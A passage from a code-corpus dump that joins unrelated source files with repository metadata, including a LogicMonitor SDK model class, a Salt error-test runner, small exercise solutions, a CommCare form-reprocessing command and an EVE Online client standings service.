host) self.l3_rpc_notifier.routers_updated(context, [router_id], None, None) return rae = self.get_router_az_extern_ip_mapping(context, router_id, host) if(rae and rae['extern_ip'] != extern_ip): update_rae = {} update_rae['router_id'] = rae['router_id'] update_rae['host'] = rae['host'] update_rae['extern_ip'] = extern_ip rae.update(update_rae) LOG.debug("update extern_ip %(extern_ip)s for az_host %(host)s " "and router %(router_id)s ", {'extern_ip': extern_ip, 'host': host, 'network_id': router_id}) self.l3_rpc_notifier.routers_updated(context, [router_id], None, None) return try: with context.session.begin(subtransactions=True): router_az_extern_ip_map = CascadeRouterAZExternipMapping( router_id=router_id, host=host, extern_ip=extern_ip) context.session.add(router_az_extern_ip_map) LOG.debug("add extern_ip %(extern_ip)s for az_host %(host)s " "and router %(router_id)s ", {'extern_ip': extern_ip, 'host': host, 'network_id': router_id}) self.l3_rpc_notifier.routers_updated(context, [router_id], None, None) except db_exc.DBDuplicateEntry: LOG.debug("DBDuplicateEntry ERR:update extern_ip %(extern_ip)s " "for az_host %(host)s and router %(router_id)s ", {'extern_ip': extern_ip, 'host': host, 'network_id': router_id}) def del_router_az_extern_ip_mapping(self, context, router_id, host): try: query = context.session.query(CascadeRouterAZExternipMapping) query.filter( CascadeRouterAZExternipMapping.router_id == router_id, CascadeRouterAZExternipMapping.host == host).delete() except exc.NoResultFound: return None
64477cf64390abc1deb7e4438116f3e5da6528d1
0412893529999de784ab9cb914f385ba788a3684
/logicmonitor_sdk/models/unmonitored_devices.py
8c2d586de6029d22e1ebdb104aec09fa77f40dc6
[ "Apache-2.0" ]
permissive
JeremyTangCD/lm-sdk-python
0326bf034c16b022b760600dc18fe7aaad42fa26
2a15e055e5a3f72d2f2e4fb43bdbed203c5a9983
refs/heads/master
2020-04-15T15:39:59.276224
2019-01-09T09:55:36
2019-01-09T09:55:36
164,803,314
0
0
Apache-2.0
2019-01-09T09:58:55
2019-01-09T06:33:40
Python
UTF-8
Python
false
false
15,888
py
# coding: utf-8 """ LogicMonitor REST API LogicMonitor is a SaaS-based performance monitoring platform that provides full visibility into complex, hybrid infrastructures, offering granular performance monitoring and actionable data and insights. logicmonitor_sdk enables you to manage your LogicMonitor account programmatically. # noqa: E501 OpenAPI spec version: 1.0.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class UnmonitoredDevices(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'device_type': 'str', 'nsp_id': 'int', 'forward_ip': 'str', 'end_date': 'str', 'ip': 'str', 'dns': 'str', 'collector_id': 'int', 'ports': 'str', 'nsp_name': 'str', 'device_status': 'str', 'manufacturer': 'str', 'collector_description': 'str', 'display_as': 'str', 'sys_name': 'str', 'nse_id': 'int', 'id': 'int', 'end_timestamp': 'int', 'status': 'str', 'nse_scan_id': 'str' } attribute_map = { 'device_type': 'deviceType', 'nsp_id': 'nspId', 'forward_ip': 'forwardIp', 'end_date': 'endDate', 'ip': 'ip', 'dns': 'dns', 'collector_id': 'collectorId', 'ports': 'ports', 'nsp_name': 'nspName', 'device_status': 'deviceStatus', 'manufacturer': 'manufacturer', 'collector_description': 'collectorDescription', 'display_as': 'displayAs', 'sys_name': 'sysName', 'nse_id': 'nseId', 'id': 'id', 'end_timestamp': 'endTimestamp', 'status': 'status', 'nse_scan_id': 'nseScanId' } def __init__(self, device_type=None, nsp_id=None, forward_ip=None, end_date=None, ip=None, dns=None, collector_id=None, ports=None, nsp_name=None, device_status=None, manufacturer=None, collector_description=None, display_as=None, sys_name=None, nse_id=None, id=None, end_timestamp=None, status=None, nse_scan_id=None): # noqa: E501 """UnmonitoredDevices - a model defined in Swagger""" # noqa: E501 self._device_type = None self._nsp_id = None self._forward_ip = None self._end_date = None self._ip = None self._dns = None self._collector_id = None self._ports = None self._nsp_name = None self._device_status = None self._manufacturer = None self._collector_description = None self._display_as = None self._sys_name = None self._nse_id = None self._id = None self._end_timestamp = None self._status = None self._nse_scan_id = None self.discriminator = None if device_type is not None: self.device_type = device_type if nsp_id is not None: self.nsp_id = nsp_id if forward_ip is not None: self.forward_ip = forward_ip if end_date is not None: self.end_date = end_date if ip is not None: self.ip = ip if dns is not None: self.dns = dns if collector_id is not None: self.collector_id = collector_id if ports is not None: self.ports = ports if nsp_name is not None: self.nsp_name = nsp_name if device_status is not None: self.device_status = device_status if manufacturer is not None: self.manufacturer = manufacturer if collector_description is not None: self.collector_description = collector_description if display_as is not None: self.display_as = display_as if sys_name is not None: self.sys_name = sys_name if nse_id is not None: self.nse_id = nse_id if id is not None: self.id = id if end_timestamp is not None: self.end_timestamp = end_timestamp if status is not None: self.status = status if nse_scan_id is not None: self.nse_scan_id = nse_scan_id @property def device_type(self): """Gets the device_type of this UnmonitoredDevices. # noqa: E501 :return: The device_type of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._device_type @device_type.setter def device_type(self, device_type): """Sets the device_type of this UnmonitoredDevices. :param device_type: The device_type of this UnmonitoredDevices. # noqa: E501 :type: str """ self._device_type = device_type @property def nsp_id(self): """Gets the nsp_id of this UnmonitoredDevices. # noqa: E501 :return: The nsp_id of this UnmonitoredDevices. # noqa: E501 :rtype: int """ return self._nsp_id @nsp_id.setter def nsp_id(self, nsp_id): """Sets the nsp_id of this UnmonitoredDevices. :param nsp_id: The nsp_id of this UnmonitoredDevices. # noqa: E501 :type: int """ self._nsp_id = nsp_id @property def forward_ip(self): """Gets the forward_ip of this UnmonitoredDevices. # noqa: E501 :return: The forward_ip of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._forward_ip @forward_ip.setter def forward_ip(self, forward_ip): """Sets the forward_ip of this UnmonitoredDevices. :param forward_ip: The forward_ip of this UnmonitoredDevices. # noqa: E501 :type: str """ self._forward_ip = forward_ip @property def end_date(self): """Gets the end_date of this UnmonitoredDevices. # noqa: E501 :return: The end_date of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._end_date @end_date.setter def end_date(self, end_date): """Sets the end_date of this UnmonitoredDevices. :param end_date: The end_date of this UnmonitoredDevices. # noqa: E501 :type: str """ self._end_date = end_date @property def ip(self): """Gets the ip of this UnmonitoredDevices. # noqa: E501 :return: The ip of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._ip @ip.setter def ip(self, ip): """Sets the ip of this UnmonitoredDevices. :param ip: The ip of this UnmonitoredDevices. # noqa: E501 :type: str """ self._ip = ip @property def dns(self): """Gets the dns of this UnmonitoredDevices. # noqa: E501 :return: The dns of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._dns @dns.setter def dns(self, dns): """Sets the dns of this UnmonitoredDevices. :param dns: The dns of this UnmonitoredDevices. # noqa: E501 :type: str """ self._dns = dns @property def collector_id(self): """Gets the collector_id of this UnmonitoredDevices. # noqa: E501 :return: The collector_id of this UnmonitoredDevices. # noqa: E501 :rtype: int """ return self._collector_id @collector_id.setter def collector_id(self, collector_id): """Sets the collector_id of this UnmonitoredDevices. :param collector_id: The collector_id of this UnmonitoredDevices. # noqa: E501 :type: int """ self._collector_id = collector_id @property def ports(self): """Gets the ports of this UnmonitoredDevices. # noqa: E501 :return: The ports of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._ports @ports.setter def ports(self, ports): """Sets the ports of this UnmonitoredDevices. :param ports: The ports of this UnmonitoredDevices. # noqa: E501 :type: str """ self._ports = ports @property def nsp_name(self): """Gets the nsp_name of this UnmonitoredDevices. # noqa: E501 :return: The nsp_name of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._nsp_name @nsp_name.setter def nsp_name(self, nsp_name): """Sets the nsp_name of this UnmonitoredDevices. :param nsp_name: The nsp_name of this UnmonitoredDevices. # noqa: E501 :type: str """ self._nsp_name = nsp_name @property def device_status(self): """Gets the device_status of this UnmonitoredDevices. # noqa: E501 :return: The device_status of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._device_status @device_status.setter def device_status(self, device_status): """Sets the device_status of this UnmonitoredDevices. :param device_status: The device_status of this UnmonitoredDevices. # noqa: E501 :type: str """ self._device_status = device_status @property def manufacturer(self): """Gets the manufacturer of this UnmonitoredDevices. # noqa: E501 :return: The manufacturer of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._manufacturer @manufacturer.setter def manufacturer(self, manufacturer): """Sets the manufacturer of this UnmonitoredDevices. :param manufacturer: The manufacturer of this UnmonitoredDevices. # noqa: E501 :type: str """ self._manufacturer = manufacturer @property def collector_description(self): """Gets the collector_description of this UnmonitoredDevices. # noqa: E501 :return: The collector_description of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._collector_description @collector_description.setter def collector_description(self, collector_description): """Sets the collector_description of this UnmonitoredDevices. :param collector_description: The collector_description of this UnmonitoredDevices. # noqa: E501 :type: str """ self._collector_description = collector_description @property def display_as(self): """Gets the display_as of this UnmonitoredDevices. # noqa: E501 :return: The display_as of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._display_as @display_as.setter def display_as(self, display_as): """Sets the display_as of this UnmonitoredDevices. :param display_as: The display_as of this UnmonitoredDevices. # noqa: E501 :type: str """ self._display_as = display_as @property def sys_name(self): """Gets the sys_name of this UnmonitoredDevices. # noqa: E501 :return: The sys_name of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._sys_name @sys_name.setter def sys_name(self, sys_name): """Sets the sys_name of this UnmonitoredDevices. :param sys_name: The sys_name of this UnmonitoredDevices. # noqa: E501 :type: str """ self._sys_name = sys_name @property def nse_id(self): """Gets the nse_id of this UnmonitoredDevices. # noqa: E501 :return: The nse_id of this UnmonitoredDevices. # noqa: E501 :rtype: int """ return self._nse_id @nse_id.setter def nse_id(self, nse_id): """Sets the nse_id of this UnmonitoredDevices. :param nse_id: The nse_id of this UnmonitoredDevices. # noqa: E501 :type: int """ self._nse_id = nse_id @property def id(self): """Gets the id of this UnmonitoredDevices. # noqa: E501 :return: The id of this UnmonitoredDevices. # noqa: E501 :rtype: int """ return self._id @id.setter def id(self, id): """Sets the id of this UnmonitoredDevices. :param id: The id of this UnmonitoredDevices. # noqa: E501 :type: int """ self._id = id @property def end_timestamp(self): """Gets the end_timestamp of this UnmonitoredDevices. # noqa: E501 :return: The end_timestamp of this UnmonitoredDevices. # noqa: E501 :rtype: int """ return self._end_timestamp @end_timestamp.setter def end_timestamp(self, end_timestamp): """Sets the end_timestamp of this UnmonitoredDevices. :param end_timestamp: The end_timestamp of this UnmonitoredDevices. # noqa: E501 :type: int """ self._end_timestamp = end_timestamp @property def status(self): """Gets the status of this UnmonitoredDevices. # noqa: E501 :return: The status of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._status @status.setter def status(self, status): """Sets the status of this UnmonitoredDevices. :param status: The status of this UnmonitoredDevices. # noqa: E501 :type: str """ self._status = status @property def nse_scan_id(self): """Gets the nse_scan_id of this UnmonitoredDevices. # noqa: E501 :return: The nse_scan_id of this UnmonitoredDevices. # noqa: E501 :rtype: str """ return self._nse_scan_id @nse_scan_id.setter def nse_scan_id(self, nse_scan_id): """Sets the nse_scan_id of this UnmonitoredDevices. :param nse_scan_id: The nse_scan_id of this UnmonitoredDevices. # noqa: E501 :type: str """ self._nse_scan_id = nse_scan_id def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(UnmonitoredDevices, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, UnmonitoredDevices): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
ca537def844347b897bbf7d508e7ed1b36881424
5d6fa3466d9fa8bd6719c6dea586163d3d089090
/codes/CHAPTER_3/Chapter_3.5_Error_Handling/Lesson_3/3.5.3_TryExcept2.py
7dddad2dacf6be45dfd851d778977a7fca8af2a4
[]
no_license
harveylabis/GTx_CS1301
cff0c1a076b1da73c66d53175330b4dedc244163
f26a5e9c4b8c29acb831444cd59d21524267825c
refs/heads/master
2023-06-26T14:44:38.976288
2021-08-02T04:20:31
2021-08-02T04:20:31
269,361,753
0
0
null
null
null
null
UTF-8
Python
false
false
597
py
mystery_value = 9 #You may modify the lines of code above, but don't move them! #When you Submit your code, we'll change these lines to #assign different values to the variables. #Create a program that divides 10 by mystery_value and prints #the result. In the case that mystery_value is equal to 0, #print "Not possible". Do not catch any other errors. This #means there will be an uncaught error in the correct answer! # #You may not use any conditionals or the type() function. #Add your code here! try: print(10/mystery_value) except ZeroDivisionError: print("Not possible")
9077243272380d510bf5f7fc9d920155d1ce0b61
239c34e56a2b586ae6618c1ccbba7e668a28fc6d
/salt/runners/error.py
9bffab178e87891343acebb2e20fbfef0018b68f
[ "Apache-2.0", "BSD-2-Clause", "MIT" ]
permissive
georgiou/salt
076ce8e62289910af960f8e45ab8c3e0131943f2
4a3b930e4f2a8bfcdd9d18c3fef9cb1eb806a3f5
refs/heads/develop
2023-09-03T10:39:01.309513
2014-03-07T15:49:29
2014-03-07T15:49:29
17,520,119
0
0
NOASSERTION
2023-09-06T17:29:01
2014-03-07T16:32:38
Python
UTF-8
Python
false
false
616
py
# -*- coding: utf-8 -*- ''' Error generator to enable integration testing of salt runner error handling ''' # Import python libs # Import salt libs import salt.utils.error def error(name=None, message=''): ''' If name is None Then return empty dict Otherwise Raise an exception with __name__ from name, message from message CLI Example: .. code-block:: bash salt-run error salt-run error.error name="Exception" message="This is an error." ''' ret = {} if name is not None: salt.utils.error.raise_error(name=name, message=message) return ret
c0413f4a1638ff5d986ce54f0cb09762125edb75
c5b9c54492cdf591a2190364e7bfb1041b63c218
/Selenium_pratice/PRATICE.py
0aa9ed5795198786069df71cfd606f54389195ae
[]
no_license
QAvinod/Interview_Question_Examples
43f7fb46f497415a8b30a8c6c5f13d2cbf6055b4
f4f6d2c4e4fcc536de5656db30021f416959cce8
refs/heads/master
2023-06-13T04:18:12.218130
2021-07-06T10:29:10
2021-07-06T10:29:10
331,185,419
0
0
null
null
null
null
UTF-8
Python
false
false
488
py
from selenium import webdriver from webdriver_manager.chrome import ChromeDriverManager from selenium.webdriver.chrome.service import Service def xpath_types(): a = 1 service = Service(executable_path=ChromeDriverManager().install()) opt = webdriver.ChromeOptions() opt.add_argument("--start-maximized") driver = webdriver.Chrome(service=service, options=opt) driver.get('https://www.amazon.in/') assert a == 1 if __name__ == '__main__': xpath_types()
[ "Vinod-E" ]
Vinod-E
a38cbb263b8e8f152f0c49822ead89c1c46ab177
551ef0567aca428a535775d3949f5d9670c0d29c
/arc/arc003/b/main.py
a12ea26e888cccfd2ec1bc149e4cebdf993c7f4b
[]
no_license
komo-fr/AtCoder
7451a9402466ce8d487d0c521128732061c647df
c916889294cb12f21e74254de43b3e17e1b354bc
refs/heads/master
2023-07-22T07:05:52.955188
2023-03-01T14:22:16
2023-03-01T14:22:16
213,109,943
0
0
null
2023-07-06T22:01:28
2019-10-06T04:44:49
Python
UTF-8
Python
false
false
201
py
#!/usr/bin/env python3 N = int(input().split()[0]) s_list = [] for _ in range(N): s = input() s = s[::-1] s_list.append(s) ans = "\n".join([s[::-1] for s in sorted(s_list)]) print(ans)
7367eeebaef104b7ba3efa04c721a5f60349632d
7c15f211adc9e9eb9f66ccdd570c9f38dff7ea8d
/packages/autorest.python/test/vanilla/legacy/Expected/AcceptanceTests/ClientEnum/clientenum/_vendor.py
3b000a3b496306b693b088034c588b9e6b4b3a76
[ "LicenseRef-scancode-generic-cla", "MIT" ]
permissive
Azure/autorest.python
cc4bfbf91ae11535731cad37cedd6b733edf1ebd
a00d7aaa3753ef05cb5a0d38c664a90869478d44
refs/heads/main
2023-09-03T06:58:44.246200
2023-08-31T20:11:51
2023-08-31T20:11:51
100,315,955
47
40
MIT
2023-09-14T21:00:21
2017-08-14T22:58:33
Python
UTF-8
Python
false
false
1,302
py
# -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from abc import ABC from typing import TYPE_CHECKING from azure.core.pipeline.transport import HttpRequest from ._configuration import ClientWithEnumConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core import PipelineClient from ._serialization import Deserializer, Serializer def _convert_request(request, files=None): data = request.content if not files else None request = HttpRequest(method=request.method, url=request.url, headers=request.headers, data=data) if files: request.set_formdata_body(files) return request class ClientWithEnumMixinABC(ABC): """DO NOT use this class. It is for internal typing use only.""" _client: "PipelineClient" _config: ClientWithEnumConfiguration _serialize: "Serializer" _deserialize: "Deserializer"
ee35ec61d28c96933eeefced4425bbb07e904ab5
c27862cc24513c1d1c221e07c261b9fe65a37f54
/logging_moudle/A_test.py
50b540b5b19a23cdb07ccb383f965a24b6193b9c
[]
no_license
MannixZ/Mannix
ac62ef29c1dcbb513b121ad9d42db851103884fc
7b86d0a619e0d6e3eecb94331ee60d89542b99f2
refs/heads/master
2020-05-26T13:27:24.979334
2019-05-23T14:10:47
2019-05-23T14:10:47
164,109,199
0
0
null
null
null
null
UTF-8
Python
false
false
385
py
#!/usr/bin/env python # -*- coding: utf-8 -*- import logging from logging_moudle.main import setup_logging # logger = logging.getLogger('main.A_test') def compler(): a = 3 b = 2 if a > b: logging.info("++++++%s %s", a, b) def hahaha(): logging.info('__________') if __name__ == '__main__': setup_logging() compler() hahaha()
13f6ebcb96f77e6bd120053c29a06acd5afdee72
f513c794fd95cb72ee776029ece38a08c4b4da0b
/corehq/apps/cleanup/management/commands/reprocess_error_forms.py
efe1b59229228cce7b52b8ed4af54578c3020968
[]
no_license
bglar/commcare-hq
a92f034a0c2faf787da8321b4d79e55f098bd89f
972129fc26864c08c7bef07874bd2a7218550bff
refs/heads/master
2021-05-28T20:44:12.876151
2015-01-16T16:23:52
2015-01-16T16:23:52
29,391,363
1
0
null
null
null
null
UTF-8
Python
false
false
2,217
py
from collections import defaultdict from django.core.management.base import BaseCommand, CommandError, LabelCommand from casexml.apps.case.util import reprocess_form_cases from corehq.apps.cleanup.xforms import iter_problem_forms from optparse import make_option from dimagi.utils.parsing import string_to_datetime class Command(BaseCommand): args = '<domain> <since>' help = ('Reprocesses all documents tagged as errors and tries to ' 'regenerate the appropriate case blocks for them. Can pass in ' 'a domain and date to process forms received after that date or ' 'just a domain to process all problem forms in the domain.') option_list = LabelCommand.option_list + \ (make_option('--dryrun', action='store_true', dest='dryrun', default=False, help="Don't do the actual reprocessing, just print the ids that would be affected"),) def handle(self, *args, **options): domain = since = None if len(args) == 1: domain = args[0] elif len(args) == 2: domain = args[0] since = string_to_datetime(args[1]) else: raise CommandError('Usage: %s\n%s' % (self.args, self.help)) succeeded = [] failed = [] error_messages = defaultdict(lambda: 0) for form in iter_problem_forms(domain, since): print "%s\t%s\t%s\t%s\t%s" % (form._id, form.received_on, form.xmlns, form.xpath('form/meta/username'), form.problem.strip()) if not options["dryrun"]: try: reprocess_form_cases(form) except Exception, e: failed.append(form._id) error_messages[str(e)] += 1 else: succeeded.append(form._id) print "%s / %s forms successfully processed, %s failures" % \ (len(succeeded), len(succeeded) + len(failed), len(failed)) if error_messages: print "The following errors were seen: \n%s" % \ ("\n".join("%s: %s" % (v, k) for k, v in error_messages.items()))
ed04c0cece483566e3d392dbc7e8b59f228424c2
bd37e10ba5aa2e241c82c0f707e832e2d2c98448
/delivery_app/administrators/apps.py
41d1adfdf06d8d58d39eb0047eb6dcb2c11de41e
[]
no_license
DmitriyBul/DimkaDeliveryApp
9d88aaf733fee5345fe1ff0ca4a83242b3ca73c4
22fe0229bbd17e978bdc279751e41c98584a0e44
refs/heads/main
2023-08-23T16:34:42.470321
2021-11-05T07:06:40
2021-11-05T07:06:40
402,777,939
1
0
null
null
null
null
UTF-8
Python
false
false
160
py
from django.apps import AppConfig class AdministratorsConfig(AppConfig): default_auto_field = 'django.db.models.BigAutoField' name = 'administrators'
96b7f757a6988a25b6d5ad78d76e2389fa42424d
bfe6c95fa8a2aae3c3998bd59555583fed72900a
/gcdSort.py
97870c2ccb58fb7d3bff9a961af1faed1095b64f
[]
no_license
zzz136454872/leetcode
f9534016388a1ba010599f4771c08a55748694b2
b5ea6c21bff317884bdb3d7e873aa159b8c30215
refs/heads/master
2023-09-01T17:26:57.624117
2023-08-29T03:18:56
2023-08-29T03:18:56
240,464,565
0
0
null
null
null
null
UTF-8
Python
false
false
1,658
py
from typing import List class Solution: def gcdSort(self, nums: List[int]) -> bool: parent = [i for i in range(10**5 + 1)] # parent=[i for i in range(30)] def find(loc): while parent[loc] != loc: loc = parent[loc] return loc def merge(loc1, loc2): p1 = find(loc1) p2 = find(loc2) parent[max(p1, p2)] = min(p1, p2) prime = [ 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409 ] for num in nums: tmp = num for i in range(len(prime)): if prime[i] * prime[i] > num: break if tmp % prime[i] != 0: continue while tmp % prime[i] == 0: tmp //= prime[i] # print('merge',prime[i],num) merge(prime[i], num) if tmp > 1: merge(tmp, num) # print(parent) nums1 = nums.copy() nums.sort() for i in range(len(nums)): if find(nums[i]) != find(nums1[i]): return False return True nums = [7, 21, 3] nums = [5, 2, 6, 2] nums = [10, 5, 9, 3, 15] print(Solution().gcdSort(nums))
5c220167824fe75cd06767eb4147fd313b5cd7c0
aad164e4efe1d55cc189c35956bfd435b14a0f52
/eve-8.21.494548/eve/client/script/ui/services/standingsvc.py
cd9b5d9e80c90852dc4d67ffe06ddadd8d5829e8
[]
no_license
Pluckyduck/eve
61cc41fe8fd4dca4fbdcc4761a37bcfeb27ed84f
9a277707ab1f162c6bd9618faf722c0be3ea93ad
refs/heads/master
2020-12-28T23:35:29.992875
2013-05-06T14:24:33
2013-05-06T14:24:33
null
0
0
null
null
null
null
UTF-8
Python
false
false
43,443
py
#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/eve/client/script/ui/services/standingsvc.py import service import blue import uthread import uix import uiutil import xtriui import operator import util import base import form import listentry import state import types from itertools import starmap import standingUtil import log import uicls import uiconst import localization class Standing(service.Service): __exportedcalls__ = {'GetTransactionWnd': [], 'GetCompositionWnd': [], 'GetStandingEntries': [], 'GetStandingEntry': [], 'GetMySecurityRating': []} __notifyevents__ = ['OnStandingSet', 'OnStandingsModified', 'ProcessSessionChange'] __guid__ = 'svc.standing' __servicename__ = 'standing' __displayname__ = 'Standing Service' def __init__(self): service.Service.__init__(self) self.gotten = 0 self.npccorpstandings, self.npccharstandings, self.npcnpcstandingsto, self.npcnpcstandingsfrom = ({}, {}, {}, {}) self.toStandingHeader = blue.DBRowDescriptor((('toID', const.DBTYPE_I4), ('standing', const.DBTYPE_R5))) self.fromStandingHeader = blue.DBRowDescriptor((('fromID', const.DBTYPE_I4), ('standing', const.DBTYPE_R5))) def OnStandingSet(self, fromID, toID, standing): if util.IsNPC(fromID): if toID == eve.session.charid: if not standing: if fromID in self.npccharstandings: if session.warfactionid: sm.ScatterEvent('OnNPCStandingChange', fromID, 0.0, self.npccharstandings[fromID].standing) del self.npccharstandings[fromID] else: oldStanding = 0.0 if fromID in self.npccharstandings: oldStanding = self.npccharstandings[fromID].standing if session.warfactionid: sm.ScatterEvent('OnNPCStandingChange', fromID, standing, oldStanding) self.npccharstandings[fromID] = blue.DBRow(self.fromStandingHeader, [fromID, standing]) elif toID == eve.session.corpid: if not standing: if fromID in self.npccorpstandings: del self.npccorpstandings[fromID] else: self.npccorpstandings[fromID] = blue.DBRow(self.fromStandingHeader, [fromID, standing]) def OnStandingsModified(self, modifications): for modification in modifications: fromID, toID, m, minAbs, maxAbs = modification minAbs, maxAbs = minAbs * 10.0, maxAbs * 10.0 if toID == eve.session.charid: if fromID in self.npccharstandings: newval = self.npccharstandings[fromID].standing if m > 0.0: if self.npccharstandings[fromID].standing < maxAbs: newval = min(maxAbs, 10.0 * (1.0 - (1.0 - self.npccharstandings[fromID].standing / 10.0) * (1.0 - m))) elif self.npccharstandings[fromID].standing > minAbs: newval = max(minAbs, 10.0 * (self.npccharstandings[fromID].standing / 10.0 + (1.0 + self.npccharstandings[fromID].standing / 10.0) * m)) if session.warfactionid: sm.ScatterEvent('OnNPCStandingChange', fromID, newval, self.npccharstandings[fromID].standing) self.npccharstandings[fromID].standing = newval else: newval = max(min(10.0 * m, maxAbs), minAbs) self.npccharstandings[fromID] = blue.DBRow(self.fromStandingHeader, [fromID, newval]) elif toID == eve.session.corpid: if fromID in self.npccorpstandings: newval = self.npccorpstandings[fromID].standing if m > 0.0: if self.npccorpstandings[fromID].standing < maxAbs: newval = min(maxAbs, 10.0 * (1.0 - (1.0 - self.npccorpstandings[fromID].standing / 10.0) * (1.0 - m))) elif self.npccorpstandings[fromID].standing > minAbs: newval = max(minAbs, 10.0 * (self.npccorpstandings[fromID].standing / 10.0 + (1.0 + self.npccharstandings[fromID].standing / 10.0) * m)) self.npccorpstandings[fromID].standing = newval else: newval = max(min(10.0 * m, maxAbs), minAbs) self.npccorpstandings[fromID] = blue.DBRow(self.fromStandingHeader, [fromID, newval]) def Run(self, memStream = None): self.__RefreshStandings() def Stop(self, memStream = None): pass def CanUseAgent(self, factionID, corporationID, agentID, level, agentTypeID): self.__Init() if factionID in self.npccharstandings: fac = self.npccharstandings[factionID].standing else: fac = 0.0 if corporationID in self.npccharstandings: coc = self.npccharstandings[corporationID].standing else: coc = 0.0 if agentID in self.npccharstandings: cac = self.npccharstandings[agentID].standing else: cac = 0.0 return util.CanUseAgent(level, agentTypeID, fac, coc, cac, corporationID, factionID, {}) def GetMySecurityRating(self): self.__Init() if const.ownerCONCORD in self.npccharstandings: return self.npccharstandings[const.ownerCONCORD].standing return 0.0 def ProcessSessionChange(self, isRemote, session, change): if 'charid' in change and change['charid'][1] or 'corpid' in change and change['corpid'][1]: self.__RefreshStandings() def __Init(self): for i in range(120): if self.gotten: break self.LogInfo('Waiting while acquiring standings') blue.pyos.synchro.SleepWallclock(1000) def __RefreshStandings(self): if not eve.session.charid: return tmp = sm.RemoteSvc('standing2').GetNPCNPCStandings() self.npcnpcstandingsto = tmp.Filter('toID') self.npcnpcstandingsfrom = tmp.Filter('fromID') if util.IsNPC(eve.session.corpid): self.npccharstandings = sm.RemoteSvc('standing2').GetCharStandings() self.npccorpstandings = {} else: ret = uthread.parallel([(sm.RemoteSvc('standing2').GetCharStandings, ()), (sm.RemoteSvc('standing2').GetCorpStandings, ())]) self.npccharstandings = ret[0] self.npccorpstandings = ret[1] if type(self.npccorpstandings) != types.DictType: self.npccorpstandings = self.npccorpstandings.Index('fromID') self.npccharstandings = self.npccharstandings.Index('fromID') self.gotten = 1 def GetStanding(self, fromID, toID): self.__Init() relationship = None standing = None if fromID == eve.session.charid: relationship = sm.GetService('addressbook').GetContacts().contacts.get(toID, None) elif fromID == eve.session.corpid and not util.IsNPC(eve.session.corpid): relationship = sm.GetService('addressbook').GetContacts().corpContacts.get(toID, None) elif fromID == eve.session.allianceid: relationship = sm.GetService('addressbook').GetContacts().allianceContacts.get(toID, None) elif toID == eve.session.charid: if util.IsNPC(fromID) and fromID in self.npccharstandings: standing = self.npccharstandings[fromID] elif toID == eve.session.corpid and not util.IsNPC(eve.session.corpid): if util.IsNPC(fromID) and fromID in self.npccorpstandings: standing = self.npccorpstandings[fromID] elif util.IsNPC(fromID) and util.IsNPC(toID) and fromID in self.npcnpcstandingsfrom: for each in self.npcnpcstandingsfrom[fromID]: if each.toID == toID: standing = each break if standing is not None: ret = standing.standing elif relationship is not None: ret = relationship.relationshipID else: ret = const.contactNeutralStanding return ret def GetEffectiveStanding(self, fromID, toID): standing = self.GetStanding(fromID, toID) or 0.0 bonus = None if toID == eve.session.charid and util.IsNPC(fromID): bonus = ('', 0.0) char = sm.GetService('godma').GetItem(eve.session.charid) if util.IsCorporation(fromID): fromFactionID = sm.GetService('faction').GetFaction(fromID) elif util.IsFaction(fromID): fromFactionID = fromID else: agent = sm.GetService('agents').GetAgentByID(fromID) fromFactionID = agent.factionID relevantSkills = {} for skillTypeID in (const.typeDiplomacy, const.typeConnections, const.typeCriminalConnections): skill = char.skills.get(skillTypeID, None) if skill is not None: relevantSkills[skillTypeID] = skill.skillLevel bonus = standingUtil.GetStandingBonus(standing, fromFactionID, relevantSkills) if bonus is None or bonus[1] <= 0.0: bonus = '' else: effective = (1.0 - (1.0 - standing / 10.0) * (1.0 - bonus[1] / 10.0)) * 10.0 bonus = localization.GetByLabel('UI/Standings/Common/BonusAdded', bonus=bonus[0], value=standing) standing = effective return (standing, bonus) def GetStandingEntry(self, ownerID, fromID, toID, standing, showBonuses = 1, label = None): self.__Init() bonus = None bonusType = None relevantSkills = {} if showBonuses: if toID == eve.session.charid and util.IsNPC(fromID): bonus 